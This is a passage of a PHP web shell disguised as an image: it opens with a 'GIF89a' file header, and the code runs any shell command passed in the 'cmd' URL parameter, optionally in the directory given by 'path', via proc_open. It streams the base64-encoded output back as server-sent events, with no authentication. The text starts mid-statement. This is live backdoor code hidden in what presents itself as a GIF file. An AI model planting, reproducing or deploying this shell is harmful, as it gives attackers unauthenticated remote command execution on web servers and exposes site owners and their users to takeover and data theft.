GIF89a;
'); } } // HANDLER STREAMING (REAL-TIME ENGINE) if(isset($_GET['stream'])){ header('Content-Type: text/event-stream'); header('Cache-Control: no-cache'); $cmd = $_GET['cmd']; $path = $_GET['path']; if($path) chdir($path); $descriptorspec = [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"]]; $process = proc_open($cmd . " 2>&1", $descriptorspec, $pipes); if (is_resource($process)) { while (!feof($pipes[1])) { $line = fgets($pipes[1]); if($line) { echo "data: " . base64_encode($line) . "\n\n"; ob_flush(); flush(); } } fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } exit; } ?>